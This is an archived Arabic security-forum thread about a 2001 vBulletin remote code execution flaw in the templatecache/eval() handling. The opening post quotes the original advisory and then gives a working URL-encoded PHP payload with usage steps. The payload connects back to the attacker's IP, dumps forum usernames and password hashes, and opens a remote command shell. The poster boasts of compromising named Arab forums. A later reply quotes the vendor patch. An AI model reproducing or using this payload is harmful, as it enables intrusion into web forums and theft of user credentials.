الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

جرب تلعب ب ال vBulltin الإصدارات القديمه

مغلقاستطلاع
بدأه RootExtractor في 8 نوفمبر 2001 · 5 رد · 2,809 مشاهدة · في ارشيف منتدى أنظمة الشبكات وأمنها
مشاركة: واتساب X فيسبوك تيليجرام

استطلاع

6 مشارك في التصويت

??? ???? ?? ??? vBulltin ????????? ???????

?????2 صوت · 33%
???0 صوت · 0%
????3 صوت · 50%
?? ???? ?? ??????? ??1 صوت · 17%
#1 صاحب الموضوع

هاي :)

كلنا نعرف منتديات الفي بي ، الأحيان ، وهذا المنتدى هو المعروف عندنا العرب بكثره ، وقبل كل شئ أحب اقول رائي أن شغلت إختراق المنتديات شئ بسيط ولا هو حق فلسفه ، إذا مكان فيه الحصول على الجذر والا بلاشي ، أنا أسمي الإختراق بعدم الوصول الى الجذر لعب عيال :)

أكيد الكل حاول يخترق الفي بي ومالقي الا شئيين في مواقع الأمن ، الأول اللي كتبته الفرنسي (على ما أعتقد) Jouko Pynnonen والثاني يخص في الجافا وهذه خلوه بعدين

vBulletin (http://www.vbulletin.com) is a commonly used web forum

system written in PHP. One of its key features is use of templates,

which allow the board administrator to dynamically modify the look of

the board.

vBulletin templates are parsed with the eval() function. This could be

somewhat safe as long as the parameters to eval() are under strict

control. Unfortunately this is where vBulletin fails. With an URL

crafted in a certain way, a remote user may control the eval() parameters

and inject arbitrary PHP code to be executed.

A remote user may thus execute any PHP code and programs as the web

server user, typically "nobody", start an interactive shell and try to

elevate their privilege. The configuration files are accessible for the

web server so the user can in any case access the MySQL database

containing the forums and user information.

According to the authors the vulnerability exist in all versions of

vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer

overrun or other platform-dependant issues, so it's presumably

exploitable under any OS or platform.

DETAILS

=======

vBulletin templates are implemented in the following way: the

gettemplate() function in global.php is used to fetch a template from

database. The code is then passed to eval(). If we take index.php for

an example, there's this code:

if ($action=="faq") {

eval("echo dovars("".gettemplate("faq")."");");

}

The dovars() function does some variable replacing, such as replace

with .

The gettemplate() function is defined in global.php:

function gettemplate($templatename,$escape=1) {

// gets a template from the db or from the local cache

global $templatecache,$DB_site;

if ($templatecache[$templatename]!="") {

$template=$templatecache[$templatename];

} else {

$gettemp=$DB_site->query_first("SELECT template FROM template WHERE title='". addslashes($templatename)."'");

$template=$gettemp[template];

$templatecache[$templatename]=$template;

}

if ($escape==1) {

$template=str_replace(""",""",$template);

}

return $template;

}

For effectiveness the function implements a simple cache for template

strings. After fetching them from the database they're stored in the

templatecache[] array. This array is checked for the template before

doing the SQL query. Unfortunately the array is never initialized, so

a user can pass array contents in the URL, e.g.

(for simplicity not %-escaped)

http://www.site.url/index.php?action=faq&templatecache[faq]=hello+world

With this URL, you won't get the FAQ page, but just a blank page

with the words "hello world".

The eval() call above will execute

echo dovars("hello world");

As if this wouldn't be bad enough, a remote user may as well pass a

value containing quotation marks and other symbols. Quotation marks

aren't always escaped as seen in the code above, in which case

index.php could end up executing code like

echo dovars("hello"world");

This would produce a PHP error message due to unbalanced quotes. It

doesn't take a rocket scientist to figure out how a remote user could

execute arbitrary code from here, so further details about exploitation

aren't necessary. If your vBulletin board produces an error message

with an URL like the one above prefixed with a single quotation mark,

it's definitely vulnerable.

The above example works with the "Lite" version. The commercial versions

are vulnerable too, but details may differ. After a little experimenting

on the Jelsoft's test site I found some of the commercial versions also

have an eval() problem with URL redirecting, e.g.

http://www.site.url/member.php?action=logi...ypass&url=hello"world

and a similar one in the Lite version:

http://www.site.url/search.php?action=simp...s&templatecache[standardredirect]=hello"world

تعرفون الكلام هذا ولا داعي لترجمه ، من الكلام هذا أنت ممكن ترسل أكواد خلف url تنفذ في السيرفر ، تضعها بدل الكلمه hello+world الغبيه ، جرب مثلا :

1- ركب في جهازك ملقم ويب أي ملقم تحبه ممكن تركب عليه vb 113 or 115

2- أفتح البورت 90 عندك في جهازك (طريقه فتح البورت تكون على مجازك)

3- أرسل الـ url هذا الى السيرفر

search.php3?action=simplesearch&query=searchthis&templatecache[standardredirect]="%29%3B%24fa="<%261";set_time_limit(substr("900",0,3));%24fp=fsockopen(substr("IP.IP.IP.IP",0,12),substr("90",0,2),%26%24errno,%26%24errstr,substr("900",0,3));if(!%24fp){}else{%24arr[200];fputs(%24fp,substr("vhak1.0,%20-d%20downloads%20database,or%20press%20return%20for%20command%20line",0,63));%24va=fgets(%24fp,3);fputs(%24fp,%24va);if(strlen(%24va)>1){include(substr("admin/config.php",0,16));include(substr("admin/config.php3",0,17));mysql_connect(substr("%24servername",0,strlen(%24servername)),substr("%24dbusername",0,strlen(%24dbusername)),substr("%24dbpassword",0,strlen(%24dbpassword)));%24currenta=mysql_db_query(substr("%24dbname",0,strlen(%24dbname)),substr("select%20*%20from%20user",0,18));while(%24res=mysql_fetch_array%20(%24currenta)){fputs(%24fp,"%24res[userid],");fputs(%24fp,"%24res[usergroupid],");fputs(%24fp,"%24res[password],");fputs(%24fp,"%24res,");fputs(%24fp,"%24res[username],");}echo(mysql_error());}while(!feof(%24fp)){unset(%24arr);%24str=exec(fgets(%24fp,substr("128",0,3)),%24arr);for(%24ir=substr("0",0,1);%24ir

By Kill -9

لاحظ IP.IP.IP.IP هذه تحط مكانها رقم الآي بي حقك ، ثم الاحظ بعدها وجود الرقم 12 وهذا تغيرها على طول رقم الآي بي ، مثلا 127.0.0.1 يكون طوله 9

ممكن أنت تخترع كود ثاني وترسله وتلاحظ أنه يتنفذ ، ممكن ترسل كود يسجل لك أدمين ، هذا مثل ما صار في arabteam.nicmatic.com (أصدقائي طبعا) من باب التنبيه ، وكمان صار في c4arab.com و طريق الإسلام و الثقافه ...وكثير من المنتديات ، بهدف التحذير وليس التخريب ، وواضح أنه عمل بسيط يحتاج لشويه من التفكير ، أعتقد أهليز زمان صار فيه ، ولكن مسحت الداتالبيس وهذا سهل للغايه

طريقه قديمه نوعا ما ، وحطيتها للي حب يجرب فقط !!

وأعذروني على الإملاء والنحو

ملاحظه أخيره : وهي عند ما تشبك مع السيرفر عن طريق البورت 90 أرسل

-d downloads

تنزل لك الداتبيس كلها ، وللأسف طلعت غير مشفره وهذا يدل على التخلف ، ولكن في الإصداره 2.2x شفرت ولكن كسرتها وقريبا أقول لك عنها

والجايات أقوى

تحياتي

الكنــــــــــدور

#2

اولا شكرا على الموضوع

ثانيا والله ينخاف منك مع اني ماجربتها

ثالثا ياريت تجرب الاشياء الجديده على منتدنا هذا اولا وفي حال راح تسوي لنا مشكله لا تحطها بالموقع :) علشان لايندمر

جديد مدونتي الشخصية http://www.badwi.com

ادعو لنا بظاهر الغيب

MyBooksExchange.jpg

#3

على فكره نسيت أضيف لكم شئ وهو أن هذا النوع من الإستثمارات يسمى Remote Code Execution وهو خطير

أخي محمد أنا وضعت الموضوع لأن فيه كثير من الناس لا رقعت ولا سويت ولا رقت ، وودي أنهم يتأدبون شويه وأخلي المجال للي بجرب يجرب ، ولكن هذا بعد ما طورتوا المنتدى ، :)

تحياتي للجميع

الكنــــــــــــــــــــــــدور

#4

شكرا كندور موضوع اكثر من رائع ...

انا كنت بعرف الثغرة بس عجبني استثمارك لها وخاصة الكود ...

سؤالي هو : ماطريقة تشفير قواعد البيانات في النسخة الجديدة؟؟

وياريت توضح بعض النقاط الامنية المضادة لمثل هذه الثغرة ( برأيك طبعا ) .............

أنا أرى ان هذا النوع من المنتديات او هذه النسخة ستبقى عالة على مبرمجيها مالم يقوموا بعمل تغييرات جذرية عليها ......

أليس كذلك ........

لك تحياتي كندور

واثق الخطوة يمشي ملكا !!

#5

أفضل حل هو الترقيه أو هذا

اقتباس
 

 

 

 

 

 

 

 

 

 

BUGTRAQ ARCHIVE    

 

 

[ Message Index ] [ Thread Index ] [ Reply ]  

[ prev Msg by Date ] [ next Msg by Date ]  

To: BugTraq  

Subject: vBulletin allows arbitrary code execution  

Date: Mar 15 2001 1:27PM  

Author: Jouko Pynnonen  

Message-ID:  

OVERVIEW

========

vBulletin (http://www.vbulletin.com) is a commonly used web forum

system written in PHP. One of its key features is use of templates,

which allow the board administrator to dynamically modify the look of

the board.

vBulletin templates are parsed with the eval() function. This could be

somewhat safe as long as the parameters to eval() are under strict

control. Unfortunately this is where vBulletin fails. With an URL

crafted in a certain way, a remote user may control the eval() parameters

and inject arbitrary PHP code to be executed.

A remote user may thus execute any PHP code and programs as the web

server user, typically "nobody", start an interactive shell and try to

elevate their privilege. The configuration files are accessible for the

web server so the user can in any case access the MySQL database

containing the forums and user information.

According to the authors the vulnerability exist in all versions of

vBulletin up to 1.1.5 and 2.0 beta 2. The bug does not involve buffer

overrun or other platform-dependant issues, so it's presumably

exploitable under any OS or platform.

DETAILS

=======

vBulletin templates are implemented in the following way: the  

gettemplate() function in global.php is used to fetch a template from

database. The code is then passed to eval(). If we take index.php for

an example, there's this code:

 if ($action=="faq") {

   eval("echo dovars("".gettemplate("faq")."");");

 }

The dovars() function does some variable replacing, such as replace

with .

The gettemplate() function is defined in global.php:

 function gettemplate($templatename,$escape=1) {

   // gets a template from the db or from the local cache

   global $templatecache,$DB_site;

   if ($templatecache[$templatename]!="") {

     $template=$templatecache[$templatename];

   } else {

     $gettemp=$DB_site->query_first("SELECT template FROM template WHERE title='". addslashes($templatename)."'");

     $template=$gettemp[template];

     $templatecache[$templatename]=$template;

   }

   if ($escape==1) {

     $template=str_replace(""",""",$template);

   }

   return $template;

 }

For effectiveness the function implements a simple cache for template

strings. After fetching them from the database they're stored in the

templatecache[] array. This array is checked for the template before

doing the SQL query. Unfortunately the array is never initialized, so

a user can pass array contents in the URL, e.g.

(for simplicity not %-escaped)

http://www.site.url/index.php?action=faq&templatecache[faq]=hello+world

With this URL, you won't get the FAQ page, but just a blank page

with the words "hello world".

The eval() call above will execute

 echo dovars("hello world");

As if this wouldn't be bad enough, a remote user may as well pass a

value containing quotation marks and other symbols. Quotation marks

aren't always escaped as seen in the code above, in which case  

index.php could end up executing code like

 echo dovars("hello"world");

This would produce a PHP error message due to unbalanced quotes. It

doesn't take a rocket scientist to figure out how a remote user could

execute arbitrary code from here, so further details about exploitation

aren't necessary. If your vBulletin board produces an error message

with an URL like the one above prefixed with a single quotation mark,

it's definitely vulnerable.

The above example works with the "Lite" version. The commercial versions  

are vulnerable too, but details may differ. After a little experimenting

on the Jelsoft's test site I found some of the commercial versions also

have an eval() problem with URL redirecting, e.g.

http://www.site.url/member.php?action=logi...ypass&url=hello"world

and a similar one in the Lite version:

http://www.site.url/search.php?action=simp...s&templatecache[standardredirect]=hello"world

SOLUTION

========

The vendor (Jelsoft Enterprises Ltd) was contacted March 2nd, and has

released fixed commercial versions 1.1.6 and 2.0 beta 3.

The vendor hasn't fixed the free "Lite" version of the software so far

and hasn't replied my query concerning it, so here is a quick fix

(I haven't programmed in PHP so anyone more PHP-literate, feel free to

correct):

 $templatecache=array();

Add that line to the beginning of global.php after the "<?php" line.

It will initialize the template cache and override any values a remote

user may have tried to pass in the URL.

Fix for the redirect problem: replace global.php line 99

 $url=$redirectloc;

with this line:

 $url=addslashes($redirectloc);

 

نوع التشفير في النسخه الجديده ما دري عنه الى الحين وقربت أخلص عليه ، وإذ ا أنتهيت من كسره أضع لكم موجز الأنباء :)

بالنسبه للطرق الممتازه لأنك تحمي نفسك هي أنه يكون للموقع فريق أمني :) وهذا هو أفضل حل

تحياتي

الكنـــــــدور

#6

أخوي الكندور ماراح أطول بالأسئلة بس سؤال واحد ياليت تجاوب عليه ...

وشهي اللغة الي وضعت فيها هالأكواد

هذا الموضوع مغلق.

مواضيع مشابهة